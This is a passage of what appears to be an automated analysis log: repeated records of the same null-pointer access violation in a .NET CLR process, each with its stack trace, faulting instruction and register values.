registers.edx: 7036824 registers.ebx: 40203824 registers.esi: 39689512 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462437 0x8462388 0xafb7e9 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 41660064 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 41658256 registers.esi: 39689512 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462437 0x8462388 0xafb7e9 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 43103336 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 43101528 registers.esi: 39689512 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462797 0x84626e8 0xafb867 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 39947268 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 39945444 registers.esi: 39689512 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462797 0x84626e8 0xafb867 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 41403852 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 41402044 registers.esi: 39689512 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462797 0x84626e8 0xafb867 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 42849280 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 42847472 registers.esi: 39689512 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xafbd1a 0xafbc60 0xafb6cd 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 44300200 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 44298376 registers.esi: 44293648 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xafbd1a 0xafbc60 0xafb6cd 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 40999032 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 40997208 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xafbd1a 0xafbc60 0xafb6cd 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 42359072 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 42357248 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8461ef6 0x8461e48 0xafb75b 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993052 registers.edi: 43719116 registers.eax: 0 registers.ebp: 3993100 registers.edx: 7036824 registers.ebx: 43717320 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8461ef6 0x8461e48 0xafb75b 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993052 registers.edi: 45409216 registers.eax: 0 registers.ebp: 3993100 registers.edx: 7036824 registers.ebx: 45407420 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8461ef6 0x8461e48 0xafb75b 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993052 registers.edi: 40230072 registers.eax: 0 registers.ebp: 3993100 registers.edx: 7036824 registers.ebx: 40228276 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462437 0x8462388 0xafb7e9 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 41611760 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 41609952 registers.esi: 39943948 registers.ecx: 17744000	1
